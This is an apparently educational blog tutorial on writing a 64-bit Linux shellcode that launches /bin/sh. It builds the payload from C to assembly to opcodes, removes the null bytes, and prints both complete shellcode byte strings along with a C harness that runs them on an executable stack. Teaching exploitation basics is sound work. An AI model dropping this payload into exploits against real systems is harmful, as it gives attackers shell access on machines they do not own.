Making of a shellcode for a 64-bit Linux.

Spoiler: a quick return to the basics of software exploitation: making a shellcode for a 64-bit architecture.

The other day, while teaching a class at INSA, I presented students with a method for making their own shellcode.

For those unfamiliar with the term, it is a string of characters containing binary code that can be executed on a machine. It must be different depending on the architecture on which it will run, but also on the OS for which it is intended.

My slides then showed, as an example, the creation of a shellcode on Linux for a 32-bit architecture. The payload was the most classic of shellcodes: opening a command line.

And obviously, I was asked the following question: “What about 64 bits?”

Here is a short article to answer the question. It details the creation of a shellcode that launches /bin/sh on Linux with a 64-bit processor.

C code

If we were really good, we could of course write the shellcode directly in machine code … But few people speak opcode fluently … Even assembly (a slightly more readable transcription of the opcodes) is not a very widespread language …

Tradition therefore has it that, when writing a shellcode, we start from C code, which we translate into assembly, then into machine code.

Writing code in C is optional, but has two advantages:

Target

The following program will launch a shell, through the use of execve. It will serve as our target: it represents exactly what we want our shellcode to do.

#include <stdio.h>
#include <unistd.h> 
#include <stdlib.h>

int main(void) {
    char *name[2];
    
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    exit(0);
}

When execve() is called, the system replaces the current process image with the one corresponding to /bin/sh. If this operation succeeds, the instruction flow of our program stops and execution continues in the new program. If it fails, execution continues with the call to exit(0).
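
The failure path described above can be observed without launching anything. The following is a minimal sketch, assuming a path that does not exist on the machine; the helper name try_exec is hypothetical and is not part of the original program.

```c
#include <stddef.h>
#include <unistd.h>

/* Try to replace the current process with the program at `path`.
 * On success this function never returns: the new program takes over.
 * On failure execve() returns -1 (and sets errno), and execution
 * simply continues with the next statement. */
int try_exec(const char *path)
{
    char *argv[] = { (char *)path, NULL };
    int rc = execve(path, argv, NULL);

    /* Only reached when execve() failed. */
    return rc;
}
```

Calling try_exec with a path such as "/nonexistent/sh" should return -1, which is exactly the situation in which our target program would reach exit(0).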

In a main like ours, the call to exit(0) is useless since, if execve failed, the program would terminate naturally anyway.

But the purpose of a shellcode is to be injected into the memory of an attacked process and executed there (e.g. through a buffer overflow, but not only). As we have no certainty either about the success of execve() or about the contents of memory after our shellcode, we prefer to force a quiet termination of the process with a call to exit() rather than let execution run on into whatever happens to follow.

If we wanted to be cleaner, we would call exit(1). But as we generally do not want to attract the attention of monitoring tools with an error return code (a 1), we lie and claim that everything is fine (with a 0).

The compilation

We compile with gcc, then we run the binary and we observe that we have indeed opened a shell.

arsouyes@VBox:~/Documents$ gcc shellcode.c -o shellcode
arsouyes@VBox:~/Documents$ ./shellcode 
$ 

If you want to observe the disassembled code with gdb, I advise you to compile with the following options:

Moving to assembly

Now that we know where we are going, we will write the assembly code corresponding to the C code.

We come up against two constraints:

The /bin/sh string

It is not possible to know in advance the address of the string /bin/sh. We will therefore have to use a trick to obtain it.

Interestingly, since we are on a 64-bit architecture, the string /bin/sh is short enough to fit in a single register. In hexadecimal, /bin/sh gives 2f 62 69 6e 2f 73 68. As we are on a little-endian architecture, the first character goes in the least significant byte, which gives 0x68732f6e69622f. Finally, since this is a C string, it must end with a null character (0x00), so the value we will store in the register is 0x0068732f6e69622f.
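
The conversion above can be checked with a few lines of C. This is only a sketch: the function name pack_le64 is hypothetical, and it assumes a string of at most 8 characters.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Pack up to 8 characters into a 64-bit value the way a little-endian
 * CPU reads them from memory: first character in the lowest byte.
 * Unused high bytes stay at 0, which doubles as the string terminator. */
uint64_t pack_le64(const char *s)
{
    size_t len = strlen(s);
    uint64_t value = 0;

    assert(len <= 8);
    for (size_t i = 0; i < len; i++)
        value |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return value;
}
```

With "/bin/sh" as input, the function should return 0x0068732f6e69622f, the constant used in the rest of the article.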

We can then push this register onto the stack. The address of the string is then the value of the stack pointer.

Execve

The second constraint is the obligation to free ourselves from any external libraries, because we are not sure that they are present. We will therefore have to go to the source of the calls, in our case to execve and exit.

The execve function is quite a special function. It requires asking the operating system to perform process control tasks. As our user process is not capable of making these kinds of requests, we have to make system calls.

A quick search in the system call table of the Linux kernel tells us that execve corresponds to system call number 59, i.e. 0x3b in hexadecimal.

By convention, when making a system call on x86-64 Linux, the parameters are passed in registers in the following order: rdi, rsi, rdx, r10, r8, r9 (the fourth is r10 rather than rcx, because the syscall instruction overwrites rcx). Likewise, by convention, the system call number must be in the rax register. The system call is then made via the assembly instruction syscall. So we need to put the address of /bin/sh in the rdi register, the address of an array holding the address of /bin/sh followed by a null pointer in the rsi register, and 0 in the rdx register. We also need to have 0x3b in the rax register.

Which translates into assembly by:

    mov    $0x3b, %rax
    mov    $0x0,  %rdx
    movabs $0x0068732f6e69622f,%r8      
    push   %r8
    mov    %rsp,  %rdi
    push   %rdx
    push   %rdi
    mov    %rsp,  %rsi
    syscall
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall     
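
The same convention can be exercised from C before going down to assembly. The sketch below relies on glibc's generic syscall() wrapper, which loads the number and the arguments into the registers for us; it is a stepping stone, not something a shellcode can depend on. The function names raw_getpid and raw_execve_sh are hypothetical.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Harmless warm-up: ask the kernel for our PID by system call number. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}

/* Same request as the target program, without the execve() wrapper:
 * number = SYS_execve (59 on x86-64), then path, argv and envp.
 * Returns only if the kernel refused to start the shell. */
long raw_execve_sh(void)
{
    char *argv[] = { "/bin/sh", NULL };

    return syscall(SYS_execve, argv[0], argv, (char **)NULL);
}
```

raw_getpid() should return the same value as getpid(); raw_execve_sh() should behave like the C target program above.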

Exit

As before, exit is a system call. It therefore works in the same way as execve, i.e. its only parameter will be in the rdi register, and its number (60, i.e. 0x3c) must be in the rax register.

Its assembly code will therefore be:

    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall    

If you want to use gdb to disassemble exit and observe its code, you will find it tedious: exit calls __run_exit_handlers, which itself does a lot of things before calling _exit, which ends up making the syscall after putting 0x3c in the rax register.
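
To see the raw exit system call at work without wading through libc, one option is to trigger it in a child process and read the status from the parent. This is a sketch under assumptions: the name raw_exit_status is hypothetical, and glibc's syscall() wrapper stands in for the bare syscall instruction.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork a child that terminates through the raw exit system call
 * (number 60 on x86-64), skipping libc's exit handlers.
 * Returns the exit status seen by the parent, or -1 on error. */
int raw_exit_status(int code)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0)
        syscall(SYS_exit, code);    /* the child never returns from here */
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

The value passed as the first argument (rdi in the assembly version) is the status the parent observes.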

Final code

Now that we have all the information we need, we can put the pieces together and write the full assembly code. To make it a standalone asm file, we add the few required decorations:

.section .text
.globl _start
_start:
    mov    $0x3b, %rax
    mov    $0x0,  %rdx
    movabs $0x0068732f6e69622f,%r8                    
    push   %r8
    mov    %rsp,  %rdi
    push   %rdx
    push   %rdi
    mov    %rsp,  %rsi
    syscall
    mov    $0x3c, %rax
    mov    $0x0,  %rdi
    syscall     

We convert to object code with as, then we generate an executable file with ld.

Since we are not using an external library, ld will just do some “decoration”, that is, the header, the entry point, and not much more …

arsouyes@VBox:~/Documents$ as -o asm.o asm.s
arsouyes@VBox:~/Documents$ ld -o asm asm.o
arsouyes@VBox:~/Documents$ ./asm
$ 

Opcode

Now that we have our assembly code, we can finally switch to machine code. Each instruction must be translated into machine code, a sequence of 0s and 1s understandable by the processor. You can use the Intel documentation for this.

But as a good computer scientist is a lazy computer scientist, we will use objdump, which will do it for us …

objdump is a command line program for displaying various information about object files. The option we are interested in is -d, which disassembles. Each instruction is printed on its own line, which begins with its address, then its hexadecimal encoding, and finally its assembly code.

arsouyes@VBox:~/Documents$ objdump -d asm.o
asm.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
 0: 48 c7 c0 3b 00 00 00 mov    $0x3b,%rax
 7: 48 c7 c2 00 00 00 00 mov    $0x0,%rdx
 e: 49 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%r8
15: 73 68 00 
18: 41 50                push   %r8
1a: 48 89 e7             mov    %rsp,%rdi
1d: 52                   push   %rdx
1e: 57                   push   %rdi
1f: 48 89 e6             mov    %rsp,%rsi
22: 0f 05                syscall 
24: 48 c7 c0 3c 00 00 00 mov    $0x3c,%rax
2b: 48 c7 c7 00 00 00 00 mov    $0x0,%rdi
32: 0f 05                syscall 

We then collect the hexadecimal bytes, in order. This is our shellcode.

\x48\xc7\xc0\x3b\x00\x00\x00\x48
\xc7\xc2\x00\x00\x00\x00\x49\xb8
\x2f\x62\x69\x6e\x2f\x73\x68\x00
\x41\x50\x48\x89\xe7\x52\x57\x48
\x89\xe6\x0f\x05\x48\xc7\xc0\x3c
\x00\x00\x00\x48\xc7\xc7\x00\x00
\x00\x00\x0f\x05
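
Copying the bytes by hand from the objdump listing is error-prone. As an illustration only, here is a small hypothetical helper (to_c_escapes is not a standard function) that turns raw bytes into the \x notation used above.

```c
#include <stddef.h>
#include <stdio.h>

/* Write `len` raw bytes into `out` as "\x.." escapes.
 * `out` must hold at least 4 * len + 1 characters.
 * Returns the number of characters written, excluding the final '\0'. */
size_t to_c_escapes(const unsigned char *bytes, size_t len, char *out)
{
    size_t pos = 0;

    out[0] = '\0';
    for (size_t i = 0; i < len; i++)
        pos += (size_t)sprintf(out + pos, "\\x%02x", (unsigned)bytes[i]);
    return pos;
}
```

Fed with the seven bytes of the first instruction (48 c7 c0 3b 00 00 00), it should produce the first seven escapes of the listing above.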

We can then test our shellcode. For that, we will use a small C code. By declaring a function pointer and giving it as value the address of the shellcode, we will be able to execute it:

#include<stdio.h>
#include<string.h>

int main(int argc, char **argv) {

    unsigned char code[] =
     "\x48\xc7\xc0\x3b\x00\x00\x00\x48"
     "\xc7\xc2\x00\x00\x00\x00\x49\xb8"
     "\x2f\x62\x69\x6e\x2f\x73\x68\x00"
     "\x41\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x48\xc7\xc0\x3c"
     "\x00\x00\x00\x48\xc7\xc7\x00\x00"
     "\x00\x00\x0f\x05";
    
    int (*ret)() = (int(*)())code;

    ret();
}

To compile, you must use the following options:

arsouyes@VBox:~/Documents$ gcc testop.c -o testop -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop 
$ exit

You may also need to install the execstack package.

And there you go! Our shellcode works!

Remove 0x00

Our shellcode is still far from ready for real-world use. The presence of 0x00 bytes in it can cause it to be truncated when it is copied with a function like strcpy, which stops at the first null byte.

An alternative must therefore be found for each problematic instruction.
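
To make the truncation concrete, the sketch below measures how many bytes of the first shellcode a strcpy-style copy would transfer. The names shellcode_v1 and bytes_before_first_nul are hypothetical; the bytes are the ones obtained from objdump earlier.

```c
#include <stddef.h>
#include <string.h>

/* First version of the shellcode (52 bytes), as produced by objdump. */
const unsigned char shellcode_v1[] =
    "\x48\xc7\xc0\x3b\x00\x00\x00\x48"
    "\xc7\xc2\x00\x00\x00\x00\x49\xb8"
    "\x2f\x62\x69\x6e\x2f\x73\x68\x00"
    "\x41\x50\x48\x89\xe7\x52\x57\x48"
    "\x89\xe6\x0f\x05\x48\xc7\xc0\x3c"
    "\x00\x00\x00\x48\xc7\xc7\x00\x00"
    "\x00\x00\x0f\x05";

/* Number of bytes a strcpy()-style copy would transfer before it
 * meets the first 0x00 and stops. */
size_t bytes_before_first_nul(const unsigned char *code)
{
    return strlen((const char *)code);
}
```

Here the copy would stop inside the very first instruction, since mov $0x3b,%rax is encoded as 48 c7 c0 3b 00 00 00.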

A mov instruction whose encoding contains 0x00 bytes can be replaced by a push followed by a pop.

In our case:

mov $0x3b,%rax and mov $0x3c,%rax are problematic and can be replaced by

    push $0x3b
    pop %rax

and

    push $0x3c
    pop %rax

An instruction putting 0x00 in a register can be replaced by an xor of the register on itself.

We therefore perform a first replacement:

#   mov    $0x0,%rdx
    xor    %rdx,%rdx

And a second:

#   mov    $0x0,%rdi
    xor    %rdi,%rdi

Finally, our string itself ends with a \0. To avoid this, we will use the 8-character string //bin/sh, which fills the r8 register completely, then shift the register right by 8 bits: this drops the extra leading / and leaves a 0 in the most significant byte, that is, at the end of the string.

In our case:

movabs $0x0068732f6e69622f,%r8 will be replaced by

#   movabs $0x0068732f6e69622f,%r8
    movabs $0x68732f6e69622f2f,%r8
    shr    $0x8,               %r8
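
The effect of the shift can be emulated in C. This is a sketch with a hypothetical helper name, shift_and_store: it applies the 8-bit right shift, then writes the value byte by byte in little-endian order, as push %r8 would on the stack.

```c
#include <stdint.h>

/* Emulate `shr $0x8, %r8` followed by `push %r8`:
 * shift the register right by 8 bits, then lay it out in memory
 * in little-endian order (lowest byte at the lowest address). */
void shift_and_store(uint64_t reg, unsigned char out[8])
{
    reg >>= 8;  /* drops the first '/', zero-fills the top byte */
    for (int i = 0; i < 8; i++)
        out[i] = (unsigned char)(reg >> (8 * i));
}
```

Starting from 0x68732f6e69622f2f, the eight bytes written should be '/', 'b', 'i', 'n', '/', 's', 'h' and a final 0x00.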

Our final assembly code will therefore be:

.section .text
.globl _start
_start:
    push $0x3b
    pop %rax
    xor %rdx,%rdx
    movabs $0x68732f6e69622f2f,%r8    
    shr $0x8, %r8                    
    push %r8
    mov %rsp, %rdi
    push %rdx
    push %rdi
    mov %rsp, %rsi
    syscall
    push $0x3c
    pop %rax
    xor %rdi,%rdi
    syscall     

Using objdump, we check that there is no 0x00 byte left:

arsouyes@VBox:~/Documents$ objdump -d asm2.o
asm2.o:     file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
 0: 6a 3b                pushq  $0x3b
 2: 58                   pop    %rax
 3: 48 31 d2             xor    %rdx,%rdx
 6: 49 b8 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%r8
 d: 2f 73 68 
10: 49 c1 e8 08          shr    $0x8,%r8
14: 41 50                push   %r8
16: 48 89 e7             mov    %rsp,%rdi
19: 52                   push   %rdx
1a: 57                   push   %rdi
1b: 48 89 e6             mov    %rsp,%rsi
1e: 0f 05                syscall 
20: 6a 3c                pushq  $0x3c
22: 58                   pop    %rax
23: 48 31 ff             xor    %rdi,%rdi
26: 0f 05                syscall
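
Reading the listing by eye works for 40 bytes; for anything longer, the check can be automated. Below is a sketch using memchr; the names shellcode_v2 and first_nul_offset are hypothetical, and the bytes are those of the listing above.

```c
#include <stddef.h>
#include <string.h>

/* Second version of the shellcode (40 bytes), from the listing above. */
const unsigned char shellcode_v2[] =
    "\x6a\x3b\x58\x48\x31\xd2\x49"
    "\xb8\x2f\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x49\xc1\xe8\x08\x41"
    "\x50\x48\x89\xe7\x52\x57\x48"
    "\x89\xe6\x0f\x05\x6a\x3c\x58"
    "\x48\x31\xff\x0f\x05";

/* Offset of the first 0x00 among the first `len` bytes, or -1 if none. */
long first_nul_offset(const unsigned char *code, size_t len)
{
    const unsigned char *hit = memchr(code, 0x00, len);

    return hit ? (long)(hit - code) : -1;
}
```

The length passed should be sizeof shellcode_v2 - 1, so that the terminator added by the C string literal is not counted as part of the shellcode.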

We therefore have a shellcode from which all the 0x00 bytes have been removed. We can test it in the same way as before, by embedding it in a C program.

#include<stdio.h>
#include<string.h>

int main(int argc, char **argv) {
    
    unsigned char code[] =
     "\x6a\x3b\x58\x48\x31\xd2\x49"
     "\xb8\x2f\x2f\x62\x69\x6e\x2f"
     "\x73\x68\x49\xc1\xe8\x08\x41"
     "\x50\x48\x89\xe7\x52\x57\x48"
     "\x89\xe6\x0f\x05\x6a\x3c\x58"
     "\x48\x31\xff\x0f\x05";
    
    int (*ret)() = (int(*)())code;

    ret();
}

By compiling and running:

arsouyes@VBox:~/Documents$ gcc testop2.c -o testop2 -fno-stack-protector -z execstack
arsouyes@VBox:~/Documents$ ./testop2 
$ exit

What next?

You can use this method to create your own shellcodes. It can of course be adapted to a 32-bit Linux, or even to Windows, and the same principle can be reused to do more than just launch a shell …